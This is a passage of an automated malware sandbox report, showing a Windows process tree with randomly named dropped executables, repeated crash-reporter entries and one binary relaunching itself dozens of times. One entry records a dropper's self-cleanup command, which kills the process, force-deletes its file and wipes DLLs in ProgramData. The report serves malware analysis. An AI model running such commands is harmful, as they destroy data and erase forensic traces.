    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 796
        5⤵
        
        PID:15116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 776
        5⤵
        
        PID:14216
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 832
        5⤵
        
        PID:14168
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 812
        5⤵
        
        PID:10552
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 772
        5⤵
        
        PID:18020
- C:\Users\Admin\Documents\nouXFQQ6gwdEahvXrRepMrFN.exe
  "C:\Users\Admin\Documents\nouXFQQ6gwdEahvXrRepMrFN.exe"
  2⤵
  - Executes dropped EXE
  PID:3748
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 736
    3⤵
    - Program crash
    PID:6900
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 740
    3⤵
    - Program crash
    PID:5452
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 760
    3⤵
    - Program crash
    PID:7260
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 764
    3⤵
    - Program crash
    PID:8084
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1228
    3⤵
    - Program crash
    PID:8480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1296
    3⤵
    - Program crash
    PID:2688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1268
    3⤵
    - Program crash
    PID:4544
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1360
    3⤵
    - Program crash
    PID:9244
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1308
    3⤵
    - Program crash
    PID:9232
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1292
    3⤵
    - Program crash
    PID:10184
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1152
    3⤵
    - Program crash
    PID:10024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1332
    3⤵
    - Program crash
    PID:9404
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 768
    3⤵
    - Program crash
    PID:2820
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1388
    3⤵
    - Program crash
    PID:10544
- C:\Users\Admin\Documents\KeLQabtEJ9pGpX1Xs16C6KJW.exe
  "C:\Users\Admin\Documents\KeLQabtEJ9pGpX1Xs16C6KJW.exe"
  2⤵
  - Executes dropped EXE
  PID:1156
- C:\Users\Admin\Documents\YeMtkoP3E6fKtR0xshI8TQuP.exe
  "C:\Users\Admin\Documents\YeMtkoP3E6fKtR0xshI8TQuP.exe"
  2⤵
  - Executes dropped EXE
  PID:1420
- - C:\Users\Admin\Documents\YeMtkoP3E6fKtR0xshI8TQuP.exe
    "C:\Users\Admin\Documents\YeMtkoP3E6fKtR0xshI8TQuP.exe" -u
    3⤵
    PID:4608
- C:\Users\Admin\Documents\8gJkfQLb9nYx0bzO0p5ui2PY.exe
  "C:\Users\Admin\Documents\8gJkfQLb9nYx0bzO0p5ui2PY.exe"
  2⤵
  - Executes dropped EXE
  PID:3172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 664
    3⤵
    - Program crash
    PID:6148
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 680
    3⤵
    - Program crash
    PID:7332
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 636
    3⤵
    - Program crash
    PID:7228
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 664
    3⤵
    - Program crash
    PID:4612
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1124
    3⤵
    - Program crash
    PID:8852
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1164
    3⤵
    - Program crash
    PID:2384
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1116
    3⤵
    - Program crash
    PID:1780
- C:\Users\Admin\Documents\fsO2YGFIZ4QF6fcUoZjF3jSf.exe
  "C:\Users\Admin\Documents\fsO2YGFIZ4QF6fcUoZjF3jSf.exe"
  2⤵
  - Executes dropped EXE
  PID:3752
- C:\Users\Admin\Documents\rFF6cE2bDCyBN9gVnUOmc2oD.exe
  "C:\Users\Admin\Documents\rFF6cE2bDCyBN9gVnUOmc2oD.exe"
  2⤵
  - Executes dropped EXE
  PID:3132
- C:\Users\Admin\Documents\ttBVzajf5NuW3Wp25Yb1x5z_.exe
  "C:\Users\Admin\Documents\ttBVzajf5NuW3Wp25Yb1x5z_.exe"
  2⤵
  - Executes dropped EXE
  PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im ttBVzajf5NuW3Wp25Yb1x5z_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ttBVzajf5NuW3Wp25Yb1x5z_.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:5892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im ttBVzajf5NuW3Wp25Yb1x5z_.exe /f
      4⤵
      Kills process with taskkill
      PID:8032
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:8776
- C:\Users\Admin\Documents\1Ksr9cx_IfC7QUTQfEMopB8e.exe
  "C:\Users\Admin\Documents\1Ksr9cx_IfC7QUTQfEMopB8e.exe"
  2⤵
  - Executes dropped EXE
  PID:2244
- C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
  "C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe"
  2⤵
  - Executes dropped EXE
  PID:768
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:416
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4688
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:2648
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5868
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:572
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5492
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5564
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3096
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4528
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5024
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6420
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7160
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6616
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6724
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4576
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6796
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6412
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7072
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7544
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7840
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5328
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8148
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7580
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4912
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5516
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8028
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7248
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7360
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7740
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 24
      4⤵
      Program crash
      PID:6712
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4560
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6380
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8248
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8680
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9060
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6064
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5784
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6740
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9008
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 24
      4⤵
      Program crash
      PID:9012
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9132
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7848
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7776
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:2384
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9024
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6044
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4208
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9304
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9588
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9860
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10152
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9452
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:5312
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9808
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10012
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10172
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:1736
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10072
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10216
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9856
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:2152
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:1304
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10400
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10704
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11024
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10284
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10724
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11232
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10740
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10616
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11188
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11036
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7688
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:8740
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11556
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11760
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:12000
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7564
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11640
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11968
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:7684
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11656
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:10340
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11772 -s 24
      4⤵
      Program crash
      PID:11292
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11416
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11080
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:6968
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 24
      4⤵
      Program crash
      PID:11772
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4468
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:12380
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:13192
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:12376
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:13144
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:2888
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:13116
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:13448
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:13752
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14064
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:9768
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14228
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:13848
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14472
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14844
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 14844 -s 24
      4⤵
      PID:13316
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15340
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14628
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15084
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:4936
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15348
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:3904
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15000
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14556
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:14796
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:11776
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15392
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
    3⤵
    PID:15688
- - C:\Users\Admin\Documents\zK3I5DvxlLqA3epTyfjnfn3X.exe
